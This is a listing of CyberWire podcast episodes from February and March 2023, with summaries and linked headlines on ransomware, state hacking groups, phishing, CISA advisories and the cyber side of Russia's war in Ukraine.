HiatusRAT exploits business-grade routers. International law enforcement action against the DoppelPaymer gang. Ransomware hits a major Barcelona hospital. Productivity suites are increasingly attractive as phishing grounds. Transparent Tribe’s romance scams. Cyberattacks briefly disrupt Russian websites and media outlets. Ashley Leonard, CEO of Syxsense, sits down with Dave to discuss their "Advancing Zero Trust Priorities'' report. Joe Carrigan on a warning from Microsoft about a surge in token theft. And trolling for disinfo raw material.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/44

Selected reading.

Black Lotus Labs uncovers another new malware that targets compromised routers (Lumen Newsroom)

Germany and Ukraine hit two high-value ransomware targets | Europol (Europol)

European Police, FBI Bust International Cybercrime Gang (VOA)

German police lift lid on worldwide cyber blackmail gang (Deutsche Welle)

Europol Hits Alleged Members of DoppelPaymer Ransomware Group (Decipher)

An international sting brings another win against ransomware gangs (Washington Post)

European police move in on DoppelPaymer (Computing)

Police Looking for Russian Suspects Following DoppelPaymer Ransomware Crackdown (SecurityWeek)

Cyberattack hits major hospital in Spanish city of Barcelona (AP NEWS).

Cyberattack Hits Major Hospital in Spanish City of Barcelona (SecurityWeek)

Barcelona's Hospital Clinic hit by ransomware cyberattack 'from outside Spain' (Euro Weekly News)

Phishers’ Favorites 2022 Year-in-Review (Vade)

Kremlin Website Down Amid Reports of Cyber Attacks on Russia (The Daily Beast)

Russian diplomat blames West for recruiting hackers for operations against Moscow (TASS)

Don’t Answer That! Russia-Aligned TA499 Beleaguers Targets with Video Call Requests (Proofpoint)

That crane might know what you’re shipping. Addressing the cybersecurity of water systems. Oakland’s ransomware incident is now a breach. Hybrid war. Investment scams. Mar 06, 2023

Cranes as a security threat. EPA memo addresses cybersecurity risks to water systems. Oakland's ransomware incident becomes a data breach. Carding rises in the Russian underworld. Sandworm's record in Russia's war. Rick Howard sits down with Andy Greenberg from Wired to discuss how Ukraine suffered more data-wiping malware last year than anywhere, ever. Dave Bittner speaks with Kathleen Smith of ClearedJobs.Net to talk about hiring veterans and setting them (and yourself) up for success. And AI’s latest misuse: bogus investment schemes.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/43

Selected reading.

WSJ News Exclusive | Pentagon Sees Giant Cargo Cranes as Possible Chinese Spying Tools (Wall Street Journal)

EPA Takes Action to Improve Cybersecurity Resilience for Public Water Systems (US EPA)

EPA presses states to include cybersecurity in water safety reviews (SC Media)

EPA Calls on States to Improve Public Water Systems’ Cybersecurity (Meritalk)

EPA issues water cybersecurity mandates, concerning industry and experts (CyberScoop)

City of Oakland Targeted by Ransomware Attack, Work Continues to… (City of Oakland).

Ransomware gang leaks data stolen from City of Oakland (BleepingComputer)

Ransomware hackers release some stolen Oakland data (CBS News)

Oakland officials say ransomware group may release personal data on Saturday (The Record from Recorded Future News)

Cybercrime site shows off with a free leak of 2 million stolen card numbers (The Record from Recorded Future News)

A year of wipers: How the Kremlin-backed Sandworm has attacked Ukraine during the war (The Record from Recorded Future News)

Bitdefender Labs warns of fresh phishing campaign that uses copycat ChatGPT platform to swindle eager investors (Hot for Security)

Gabriela Smith-Sherman: Thriving in the chaos. [Cyber governance] [Career Notes] Mar 05, 2023

Gabriela Smith-Sherman, a former Federal agency CISO with over 15 years of experience in leading and implementing comprehensive enterprise cybersecurity programs and initiatives, sits down to share her journey. She is a U.S. combat disabled veteran who understands the importance of mission and is dedicated to delivering high-quality results and value to customers through innovative solutions. Gabriela shares about her time in the military and how her being apart of the service was one of the best decisions she made and dedicates all her hard work to her time in the military. She also shares how it was tough getting out of the routine of the military and being a civilian now was a hard transition, but she says that she thrives in the chaos of the IT world and that the military helped her to prepare for the cyber industry. She said "I think my military experience has prepared me, uh, to be in those kind of chaotic positions and be very calm about the approach." We thank Gabriela for sharing her story with us.

New exploits are tricking Chrome. [Research Saturday] Mar 04, 2023

Dor Zvi, Co-Founder and CEO from Red Access to discuss their work on "New Chrome Exploit Lets Attackers Completely Disable Browser Extensions." A recently patched exploit is tricking Chrome browsers on all popular OSs to not only give attackers visibility of their targets’ browser extensions, but also the ability to disable all of those extensions.

The research states the exploit consists of a bookmarklet exploit that allows threat actors to selectively force-disable Chrome extensions using a handy graphical user interface making Chrome mistakenly identify it as a legitimate request from the Chrome Web Store.

The research can be found here:

New Chrome Exploit Lets Attackers Completely Disable Browser Extensions

More on how the US will implement its new National Cybersecurity Strategy. Emissary Panda and Mustang Panda are back. Responding to phishing. Royal ransomware. Water utility security. Mar 03, 2023

Implementing the US National Cybersecurity Strategy. The US National Cybersecurity Strategy was informed by lessons from Russia's war. Two threat actors from China up their game. Responding to a phishing campaign. #StopRansomware: Royal Ransomware. CISA releases five ICS advisories. Sameer Jaleel, Kent State University Associate CIO on closing functionality gaps and creating a safer digital environment for students.Johannes Ullrich from SANS on establishing an "End of Support" inventory.EPA issues a memo on water system cybersecurity.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/42

Selected reading.

National Cybersecurity Strategy (The White House)

US cyber leaders discuss the new National Cyber Strategy. (CyberWire)

Biden vows to wield ‘all instruments’ in fighting cyberthreats (Defense News)

Chinese state-backed hackers Iron Tiger target Linux devices with new malware (Tech Monitor)

Chinese hackers use new custom backdoor to evade detection (BleepingComputer)

Scam alert: Trezor warns users of new phishing attack (Cointelegraph)

FBI and CISA Release #StopRansomware: Royal Ransomware | CISA (Cybersecurity and Infrastructure Security Agency CISA)

CISA Releases Five Industrial Control Systems Advisories | CISA (Cybersecurity and Infrastructure Security Agency CISA)

EPA Takes Action to Improve Cybersecurity Resilience for Public Water Systems (US EPA)

CISA Alert AA23-061A – #StopRansomware: Royal ransomware. Mar 03, 2023

CISA and FBI are releasing this joint advisory to disseminate known Royal ransomware IOCs and TTPs identified through recent FBI threat response activities.

AA23-061A Alert, Technical Details, and Mitigations

AA23-061A STIX XML

Royal Rumble: Analysis of Royal Ransomware (cybereason.com)

DEV-0569 finds new ways to deliver Royal ransomware, various payloads - Microsoft Security Blog

2023-01: ACSC Ransomware Profile - Royal | Cyber.gov.au

See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

CISA Alert AA23-059A – CISA red team shares key findings to improve monitoring and hardening of networks. [CISA Cybersecurity Alerts] Mar 03, 2023

The Cybersecurity and Infrastructure Security Agency is releasing this Cybersecurity Advisory detailing activity and key findings from a recent CISA red team assessment—in coordination with the assessed organization—to provide network defenders recommendations for improving their organization's cyber posture.

AA23-059A Alert, Technical Details, and Mitigations

No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

See CISA Insights Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses for guidance on hardening MSP and customer infrastructure.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov

To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.

CyberWire commentary: Ukraine one year on. [Special Edition] Mar 03, 2023

CyberWire Daily podcast host Dave Bittner is joined by CyberWire editor John Petrik for an extended discussion about the Russian invasion of Ukraine and its effect on cybersecurity at the one year anniversary. John and his team have covered the Ukrainian conflict with daily news stories since the invasion began, and in fact, had quite a lot of coverage prior to the invasion. They take stock of where things stand, what has happened, and what we expected versus reality.

The US National Cybersecurity Strategy is out, and we have a preliminary look. CISA red-teams critical infrastructure. A new cryptojacker is out. Russia bans messaging apps. Hacktivist auxiliaries. Mar 02, 2023

The White House releases its US National Cybersecurity Strategy. Red-teaming critical infrastructure. Redis cryptojacker discovered. Russia bans several messaging apps. Our guest is Kapil Raina from CrowdStrike with the latest on Threat Hunting. Dinah Davis from Arctic Wolf on the top healthcare industry cyber attacks. And hacktivist auxiliaries continue their nuisance-level activities.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/41

Selected reading.

National Cybersecurity Strategy (The White House)

FACT SHEET: Biden-Harris Administration Announces National Cybersecurity Strategy (The White House)

Biden administration releases new cybersecurity strategy (AP NEWS)

White House pushes for mandatory regulations, more offensive cyber action under National Cyber Strategy (The Record from Recorded Future News)

Here's why Biden's new cyber strategy is notable (Washington Post)

How the U.S. National Cyber Strategy Reaches Beyond Government Agencies (Wall Street Journal)

Biden National Cyber Strategy Seeks to Hold Software Firms Liable for Insecurity (Wall Street Journal)

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks (Cybersecurity and Infrastructure Security Agency CISA)

CISA red-teamed a 'large critical infrastructure organization' and didn't get caught (The Record from Recorded Future News)

Redis Miner Leverages Command Line File Hosting Service (Cado Security | Cloud Investigation)

Russia bans foreign messaging apps (Computing)

U.S. Consulate hacked by "Putin supporters" (Newsweek)

How an attack led to a breach that enabled further social engineering. Forensic visibility in the Google Cloud Platform. Hacktivist auxiliaries. Two 8Ks and a free decryptor. Mar 01, 2023

The LastPass data breach built on an earlier attack. Forensic visibility and the Google Cloud Platform. An overview of hacktivist auxiliaries in Russia's war against Ukraine. Dish acknowledges sustaining a cyberattack. MKS Instruments discloses a ransomware incident. Carole Theriault has a lesson about ChatGPT and school systems. Ann Johnson from Afternoon Cyber Tea speaks with Stacy Hughes from Voya Financial about her journey to being CISO. And Bitdefender releases a decryptor for MortalKombat ransomware.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/40

Selected reading.

LastPass sustains a second data breach. (CyberWire)

Incident 2 – Additional details of the attack (LastPass Support)

LastPass Says DevOps Engineer Home Computer Hacked (SecurityWeek)

LastPass: Keylogger on home PC led to cracked corporate password vault (Naked Security)

LastPass data was stolen by hacking an employee’s home computer (The Verge)

LastPass says employee’s home computer was hacked and corporate vault taken (Ars Technica)

LastPass is in Big Trouble (Gizmodo)

LastPass: DevOps engineer hacked to steal password vault data in 2022 breach (BleepingComputer)

The LastPass security breach is still going from bad to worse (Cybersecurity Connect)

Mitiga on forensic visibility and the Google Cloud Platform. (CyberWire)

Mitiga Security Advisory: Insufficient Forensic Visibility in GCP Storage (Mitiga)

Google Cloud Platform Exfiltration: A Threat Hunting Guide (Mitiga)

The Cyber Warfare Report (GroupSense)

Dish Network confirms ransomware attack behind multi-day outage (BleepingComputer)

DISH tells SEC that ransomware attack caused outages; personal info may have been stolen (The Record from Recorded Future News)

Ransomware attack on chip supplier causes delays for semiconductor groups (Financial Times)

Bitdefender Releases Decryptor for MortalKombat Ransomware (Bitdefender Labs)

Victims of MortalKombat ransomware can now decrypt their locked files for free (The Record from Recorded Future News)

Data breach at the US Marshals Service. Blind Eagle phishes in the service of espionage. Dish investigates its outages. Qakbot delivered via OneNote files. Memory-safe coding. Feb 28, 2023

The US Marshals Service sustains a data breach. Blind Eagle is a phish hawk. Dish continues to work toward recovery. OneNote attachments are used to distribute Qakbot. Ben Yelin has analysis on the Supreme Court’s hearing on a section 230 case. Mr Security Answer Person John Pescatore has thoughts on Chat GPT. And CISA Director Easterly urges vendors to make software secure-by-design.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/39

Selected reading.

U.S. Marshals Service investigating ransomware attack, data theft (BleepingComputer)

US Marshals says prisoners’ personal information taken in data breach (TechCrunch)

Blind Eagle Deploys Fake UUE Files and Fsociety to Target Colombia's Judiciary, Financial, Public, and Law Enforcement Entities (BlackBerry)

Dish hit by multiday outage after reported cyberattack (TechCrunch)

DISH says ‘system issue’ affecting internal servers, phone systems (The Record from Recorded Future News)

Take Note: Armorblox Stops OneNote Malware Campaign (Armorblox)

Ukraine & Intelligence: One Year on – with Shane Harris (SpyCast)

U.S. cyber official praises Apple security and suggests Microsoft, Twitter need to step it up (CNBC)

U.S. cyber chief warns tech companies to curb unsafe practices (CBS News)

Tech manufacturers are leaving the door open for Chinese hacking, Easterly warns (The Record from Recorded Future News)

CISA Director Calls Out Industry Using Consumers as Cyber 'Crash Test Dummies' (Nextgov.com)

The Designed-in Dangers of Technology and What We Can Do About It (Cybersecurity and Infrastructure Security Agency)

Artificial intelligence behaving badly? Or just tastelessly? Third-party risks. Signs that the advantage may be tilting toward the defender. Feb 27, 2023

Social engineering with generative AI. Mylobot and BHProxies. PureCrypter is deployed against government organizations and staged through Discord. Dish Network reports disruption. Third-party app and software as a service risk. Further assessments of the cyber phase of Russia's war so far, with warnings to stay alert. Are tough times coming in gangland? Comments on NIST's revisions to its Cybersecurity Framework are due this Friday. AJ Nash from ZeroFox on Mis/Dis/and Malinformation. Rick Howard digs into Zero Trust. And get this—AI is writing science fiction!

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/38

Selected reading.

Social engineering with generative AI. (CyberWire)

Who’s Behind the Botnet-Based Service BHProxies? (KrebsOnSecurity)

Mylobot: Investigating a proxy botnet (Bitsight)

PureCrypter targets government entities through Discord (Menlo Security)

PureCrypter malware hits govt orgs with ransomware, info-stealers (BleepingComputer)

Uncovering the Risks & Realities of Third-Party Connected Apps: ‍2023 SaaS-to-SaaS Access Report (Adaptive Shield)

Ukraine war anniversary likely to bring ‘disruptive’ cyberattacks on West, agencies warn (Global News)

How the Ukraine War Has Changed Russia’s Cyberstrategy (Foreign Policy)

A year of wiper attacks in Ukraine (WeLiveSecurity)

Russia's yearlong cyber focus on Ukraine (Axios)

A year after Russia's invasion, cyberdefenses have improved around the world (Washington Post)

One year on, how is the war playing out in cyberspace? (WeLiveSecurity)

The Russia-Ukraine cyber war: one year later (IT World Canada)

Russia launched large-scale operations in cyberspace alongside war (euronews)

WSJ News Exclusive | Hackers Extort Less Money, Are Laid Off as New Tactics Thwart More Ransomware Attacks (Wall Street Journal)

AI-generated fiction is flooding literary magazines — but not fooling anyone (The Verge)

Mike Fey: Highs are high and lows are low. [CEO] [Career Notes] Feb 26, 2023

Mike Fey, CEO and co-founder of Island.io, joins to share his story, falling in love with technology and being fascinated by it at a young age. Mike quickly started working for companies where he grew in his role, becoming CTO of McAfee and then GM of the Enterprise business, stepping out to then become president and COO of Blue Coat, which was eventually acquired by Symantec, eventually wanting to get into his own business. He shares that being a small business owner is a lot of hard work and very tiring at times, he says "especially in a startup, the highs are very high and the lows are very low." Mike also mentions how easy it is to get knocked down when being in charge of your own business, but that teamwork is what helps to bring him back up. Mike says he wants to eventually help change the world and hopefully his legacy will help him to do that some day. We thank Mike for sharing his story with us.

The next hot AI scam. [Research Saturday] Feb 25, 2023

Andy Patel from WithSecure Labs joins with Dave to discuss their study that demonstrates how GPT-3 can be misused through malicious and creative prompt engineering. The research looks at how this technology, GPT-3 and GPT-3.5, can be used to trick users into scams.

GPT-3 is a user-friendly tool that employs autoregressive language to generate versatile natural language text using a small amount of input that could inevitably interest cybercriminals. The research is looking for possible malpractice from this tool, such as phishing content, social opposition, social validation, style transfer, opinion transfer, prompt creation, and fake news.

The research can be found here:

Creatively malicious prompt engineering

A look at the cyber aspects of Russia’s war, on the first anniversary of the invasion of Ukraine. And a few notes from elsewhere in cyberspace. Feb 24, 2023

CISA advises increased vigilance on the first anniversary of Russia's war. CERT-UA reports current Russian cyberattacks were prepared in December 2021. How the war has changed the cyber underworld. Air raid alerts sound in nine Russian cities; Russia blames hacking. Our space correspondent Maria Varmazis speaks with Zhanna Malekos Smith at the Center for Strategic & International Studies about a new security agreement between Japan and the US. Kathleen Smith of ClearedJobs.Net clears misperceptions about the cleared space. And Dole continues recovery from ransomware.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/37

Selected reading.

CISA Urges Increased Vigilance One Year After Russia's Invasion of Ukraine (Cybersecurity and Infrastructure Security Agency | CISA)

Ukraine says Russian hackers backdoored govt websites in 2021 (BleepingComputer)

Ukraine suffered more data-wiping malware than anywhere, ever (Ars Technica)

The First Crypto War? Assessing the Illicit Blockchain Ecosystem One Year Into Russia's Invasion of Ukraine (TRM Insights)

Ransomware Gang Conti Has Re-Surfaced and Now Operates as Three Groups: TRM Labs (CoinDesk).

Ukraine suffered more data-wiping malware than anywhere, ever (Ars Technica)

Russia-Ukraine War: 3 Cyber Threat Effects, 1 Year In (ReliaQuest)

Russian cybercrime alliances upended by Ukraine invasion (Register) Study: Old pacts ditched the moment Moscow moved in

How the Russia-Ukraine war has changed cyberspace (The Hill)

Authorities blame hackers after air raid sirens sound over radio in multiple Russian cities (Meduza)

Russia blames 'hackers' for fake missile strike alerts (Register)

Fruit giant Dole suffers ransomware attack impacting operations (BleepingComputer)

Food giant Dole hit by ransomware (Computing)

CISA Releases Three Industrial Control Systems Advisories (CISA)

Hybrid war and cyber espionage. Ransomware in the produce aisle. Bypassing security filters in a BEC campaign. Identity-based attacks. Avoid pirated software. And what the bots have been scalping. Feb 23, 2023

Cyberattacks in Russia's war so far, and their future prospects. The Lazarus Group may be employing a new backdoor. Clasiopa targets materials research organizations. Ransomware interferes with food production. Evernote is used in a BEC campaign to bypass security filters. Identity-based cyberattacks. Pirated versions of Final Cut Pro deliver cryptominers. Caleb Barlow has thoughts on Twitter, Mudge, and lessons learned. Marc Van Zadelhoff from Cyber CEOs Decoded podcast speaks with Amanda Renteria, CEO of Code for America, about attracting diverse talent. And what have the scalperbots been up to, lately.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/36

Selected reading.

A year into Ukraine, looking back at 5 prewar predictions (Breaking Defense)

Dutch intelligence: Many cyberattacks by Russia are not yet public knowledge (The Record from Recorded Future News)

WinorDLL64: A backdoor from the vast Lazarus arsenal? (WeLiveSecurity)

Clasiopa: New Group Targets Materials Research (Symantec)

Cyberattack on food giant Dole temporarily shuts down North America production, company memo says (CNN Business)

Business Email Compromise Scam Leads to Credential Harvesting Evernote Page (Avanan)

The 2023 State of Identity Security Report (Oort)

Beware of macOS cryptojacking malware. (Jamf Threat Labs)

Quarterly Index: Top 5 Scalper Bot Targets of Q4 2022 (Netacea)

Vulnerabilities newly exploited in the wild. A new cyberespionage campaign. Trends in the C2C marketplace. Hacktivists, other auxiliaries, and the laws of armed conflict. Feb 22, 2023

CISA adds three entries to its Known Exploited Vulnerabilities Catalog. "Hydrochasma" is a new cyberespionage threat actor. IBM claims the biggest effect of cyberattacks in 2022 was extortion. Social network hijacking in the C2C market. A credential theft campaign against data centers. LockBit claims an attack on a water utility in Portugal. Tim Starks from the Washington Post describes calls to focus on harmonizing cyber regulations. Our guest is Luke Vander Linden, host of the RH-ISAC Podcast. Disrupting Mr. Putin's speech, online, and what the hybrid war suggests about the future of cyber auxiliaries.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/35

Selected reading.

CISA Adds Three Known Exploited Vulnerabilities to Catalog (CISA)

Hydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia (Symantec)

IBM Security X-Force Threat Intelligence Index 2023 (IBM)

S1deload Stealer – Exploring the Economics of Social Network Account Hijacking (Bitdefender Labs)

Cyber Attacks on Data Center Organizations (Resecurity)

Hackers Scored Data Center Logins for Some of the World's Biggest Companies (Bloomberg)

LockBit gang takes credit for attack on water utility in Portugal (The Record from Recorded Future News)

Ukraine Suffered More Data-Wiping Malware Last Year Than Anywhere, Ever (WIRED)

Ukrainian hackers claim disruption of Russian TV websites during Putin speech (The Record from Recorded Future News)

Ukraine's volunteer cyber army could be model for other nations: experts (Newsweek)

Ukraine's largest charity wants to raise $1.3 million for ‘cyber offensive’ (The Record from Recorded Future News)

GoDaddy's compromise. Twitter disables SMS authentication for all but blue-checked users. Deutsche DDoS. Is Bing channeling Tay? Feb 21, 2023

GoDaddy has discovered a compromise of its systems. Twitter disables SMS authentication for those not subscribed to Twitter Blue. Last week’s cyber incident impacting German airports was confirmed to be DDoS. The consequences of cyber irregular participation in cyber wars. Semiconductor tech giant Applied Materials sees significant financial losses from a cyberattack. Joe Carrigan on scammers dangling fake job offers to students. Our guests are Max Shuftan & Monisha Bush from the SANS Institute, on the reopening of their HBCU Cyber Academy application window. And is Bing channeling Tay?

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/34

Selected reading.

GoDaddy Inc. - Statement on recent website redirect issues (GoDaddy)

GoDaddy: Hackers stole source code, installed malware in multi-year breach (Bleeping Computer)

GoDaddy SEC Filing (SEC)

An update on two-factor authentication using SMS on Twitter(Twitter)

Twitter Limits SMS-Based 2-Factor Authentication to Blue Subscribers Only (The Hacker News)

SMS-Based 2FA Will Be Limited to Twitter Blue Users (HackRead)

Twitter will limit uses of SMS 2-factor authentication. What does this mean for users? (NPR)

Twitter's Two-Factor Authentication Change 'Doesn't Make Sense' (WIRED)

Twitter Shuts Off Text-Based 2FA for Non-Subscribers (SecurityWeek)

Official: Twitter will now charge for SMS two-factor authentication (The Verge)

German airport websites downed by DDoS attacks (Register)

German airports hit by DDoS attack, ‘Anonymous Russia’ claims responsibility (The Record from Recorded Future)

Russian phishing attacks flooded Ukraine, tripled against NATO nations in 2022: Report (Breaking Defense)

Civilian hackers could become military targets, Red Cross warns (The Record from Recorded Future News)

I helped create a 'cyber army' to help Ukraine defeat Russia. We can't fight with guns, but we can fight with our laptops. (Business Insider)

How Uncle Sam enlisted Big Tech to thwart Russia from launching catastrophic cyberwar (The Washington Times)

Big Tech Descends on Munich Conference in Support of Ukraine (Bloomberg)

Applied Materials will take a $250M hit to sales this quarter, thanks to a cyberattack at one of its suppliers (Silicon Valley Business Journal)

Semiconductor industry giant says ransomware attack on supplier will cost it $250 million (The Record by Recorded Future)

How should AI systems behave, and who should decide? (OpenAI)

Why Bing Is Being Creepy (Intelligencer)

Microsoft's new chatbot is a liar. And it says it's ready to call the cops. (Mother Jones)

After AI chatbot goes a bit loopy, Microsoft tightens its leash (Washington Post).

My Week of Being Gaslit and Lied to by the New Bin (Information)

Modernizing the U.S. Navy's cybersecurity posture. [Special Edition] Feb 20, 2023

Dave Bittner had a conversation with Commander Brandon Campbell of US Navy Cyber Defense Operations Command and Captain Steve Correia, Commanding Officer of Naval Network Warfare Command. They discussed the Navy’s cybersecurity advances and how they have implemented them.

Commander Brandon Campbell is the former Operations Director at Navy Cyber Defense Operations Command and Task Force 1020 where they protect, detect, and respond to global cyber threats against Navy networks.

Captain J. Steve Correia is the Commanding Officer of Naval Network Warfare Command and the Commander of Task Force 1010 under the U.S. Navy’s Fleet Cyber Command where they execute tactical-level command and control to direct, operate, maintain and secure Navy communication and network systems.

Rachel Tobac: Find a way to laugh. [CEO] [Career Notes] Feb 19, 2023

Rachel Tobac, CEO from SocialProof Security sits down to share her amazing story on becoming what's known in the industry as an ethical hacker and CEO of a company. Rachel shares how she was always fascinated with spy movies and as she grew older that fascination turned into a real desire. Finding out she liked learning how the human brain works, she decided to start off in neuroscience. Wanting a change and with the help of her husband she was able to start getting more into hacking, finding she loved the fact that she was pretending to be someone to hack into a company and finding the weak spots. She shares how as a leader now she likes to be authentic with her team. She says "I think in the security world sometimes we take ourselves pretty seriously and a lot of times it's because we're dealing with really serious topics, and so in the moment we have to be extremely serious, but when you get a five minute break in between your crisis meetings, find a way to laugh if you can." We thank Rachel for sharing her story with us.

Implementing and achieving security resilience. [Research Saturday] Feb 18, 2023

Wendy Nather from Cisco sits down with Dave to discuss their work on "Cracking the Code to Security Resilience: Lessons from the Latest Cisco Security Outcomes Report." The report describes what security resilience is, while also going over how companies can achieve this resilience.

Wendy talks through some of the key findings based off of the report, and after surveying 4,751 active information security and privacy professionals from 26 countries, we find out some of the top priorities to achieving security resilience. From there the research goes on to explain from the findings which data-backed practices lead to the outcomes that can be implemented in cybersecurity strategies.

The research can be found here:

FBI Investigates a network incident. Developments in cybercrime. DDoS against German airports. US forms a Disruptive Technology Strike Force. CISA releases 15 ICS advisories. Feb 17, 2023

The FBI is investigating incidents on its networks. Frebniis backdoors Microsoft servers. ProxyShell vulnerabilities are used to install a cryptominer. Havoc's post-exploitation framework. Atlassian discloses a data breach. German airports sustain a cyber incident. An Aspen Institute report concludes that cyber assistance benefits Ukraine. US announces "Disruptive Technology Strike Force." Robert M. Lee from Dragos on the value of capture the flag events. Our guests are Commander Brandon Campbell of US Navy Cyber Defense Operations Command and Captain Steve Correia, Commanding Officer of Naval Network Warfare Command. And CISA releases fifteen ICS advisories.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/33

Selected reading.

Exclusive: FBI says it has 'contained' cyber incident on bureau's computer network (CNN)

Frebniis: New Malware Abuses Microsoft IIS Feature to Establish Backdoor (Symantec, by Broadcom Software)

ProxyShellMiner Campaign Creating Dangerous Backdoors (Morphisec)

Attacks with novel Havoc post-exploitation framework identified (SC Media)

Atlassian says recent data leak stems from third-party vendor hack (BleepingComputer)

German airport websites down in possible hacker attack (Deutsche Welle)

The Cyber Defense Assistance Imperative – Lessons from Ukraine (Aspen Institute)

U.S. launches 'disruptive technology' strike force to target national security threats (Reuters)

Justice Department to Increase Scrutiny of Technology Exports, Investments (Wall Street Journal)

ICS-CERT Advisories (CISA)

APT37 has some new tricks. Multilingual BEC attacks. A look at the cyber phases of Russia’s war, and how being a crime victim may now be another way of serving the state. Influencers behaving badly. Feb 16, 2023

North Korea's APT37 is distributing M2RAT. Multilingual BEC attacks, and how they happen. Assessing the cyber phase of Russia's war as the first anniversary of the invasion approaches. Killnet's attempt to rally hacktivists and criminals to the cause of Russia. Dinah Davis from Arctic Wolf describes continuous network scanning. Our guest is Dr. Inka Karppinen of CybSafe with a look at cyber security through the lens of a behavioral psychologist. And Grand Theft Auto is now also a TikTok challenge.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/32

Selected reading.

RedEyes hackers use new malware to steal data from Windows, phones (BleepingComputer)

Multilingual Executive Impersonation Attacks (Abnormal Intelligence)

Fog of War: How the Ukraine Conflict Transformed the Cyber Threat Landscape (Google Threat Analysis Group)

Following the Money: Killnet’s ‘Infinity Forum’ Wooing Likeminded Cybercriminals (Flashpoint)

Hyundai, Kia patch bug allowing car thefts with a USB cable (BleepingComputer)

Hyundai and Kia Launch Service Campaign to Prevent Theft of Millions of Vehicles Targeted by Social Media Challenge (NHTSA)

A look at the SideWinder APT. GoAnywhere vulnerability exploited in the wild. Ransomware rampant. Hacktivism in Russia’s hybrid war. Patch Tuesday notes. Feb 15, 2023

SideWinder is an APT with possible origins in India. MortalKombat ransomware debuts. The GoAnywhere zero day was exploited in a data breach. Belarusian Cyber-Partisans release Russian data. Betsy Carmelite from Booz Allen Hamilton shares an overview of cyber deception. Our guest is Ashley Allocca from Flashpoint with a look at the Breaches and Malware Threat Landscape. And notes on Patch Tuesday.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/31

Selected reading.

Molted skin: APT SideWinder 2021 campaign that targeted over 60 companies in the Asia-Pacific (Group-IB)

New MortalKombat ransomware and Laplas Clipper malware threats deployed in financially motivated campaign (Cisco Talos Blog)

Tonga is the latest Pacific Island nation hit with ransomware (The Record from Recorded Future News)

LockBit demanded £66mn from Royal Mail (Computing)

City of Oakland declares state of emergency after ransomware attack (BleepingComputer)

City of Oakland Targeted by Ransomware Attack, Work Continues to Secure and Restore Services Safely (City of Oakland)

Huge data dump from Russia’s censorship agency posted online (Cybersecurity Connect)

Russian system to scan internet for undesired content and dissent (Reuters)

Patch Tuesday: Three zero-days and nine 'Critical' RCE flaws fixed (Computing)

Microsoft February 2023 Patch Tuesday fixes 3 exploited zero-days, 77 flaws (BleepingComputer)

Apple Releases Security Updates for Multiple Products (CISA)

SAP Security Patch Day for February 2023 (Onapsis)

Citrix Releases Security Updates for Workspace Apps, Virtual Apps and Desktops (CISA)

Adobe Releases Security Updates for Multiple Products (CISA)

The first national cyber director's last day is today (Washington Post)

Blender is back, but now DBA Sinbad (still working for the Lazarus Group). Cyberespionage notes. Hacktivism. ICS threats. Valentine’s Day scams. Feb 14, 2023

"Blender" reappears as "Sinbad." A Tonto Team cyberespionage attempt against Group-IB is thwarted. DarkBit claims responsibility for a ransomware attack on Technion University. An overview of ICS and OT security. Ben Yelin looks at surveillance oversight at the state level. Ann Johnson from Afternoon Cyber Tea speaks with Marene Allison about the CISO transformation. And it’s Valentine's Day, that annual holiday of love, chocolate, flowers, and online scams.

For links to all of today's stories check out our CyberWire daily news briefing:

https://thecyberwire.com/newsletters/daily-briefing/12/30

Selected reading.

Has a Sanctioned Bitcoin Mixer Been Resurrected to Aid North Korea’s Lazarus Group? (Elliptic Connect)

Nice Try Tonto Team (Group-IB)

Hackers attack Israel’s Technion University, demand over $1.7 million in ransom (ARN)

Israel's top tech university postpones exams after ransomware attack (The Record from Recorded Future News)

Russian hackers ‘disrupt Turkey-Syria earthquake aid’ in cyber attack on Nato (The Independent)

Killnet DDoS attacks disrupt Nato websites (ComputerWeekly.com)

Russian Hackers Disrupt NATO Earthquake Relief Operations (Dark Reading)

What Happened to #OpRussia? (Dark Reading)

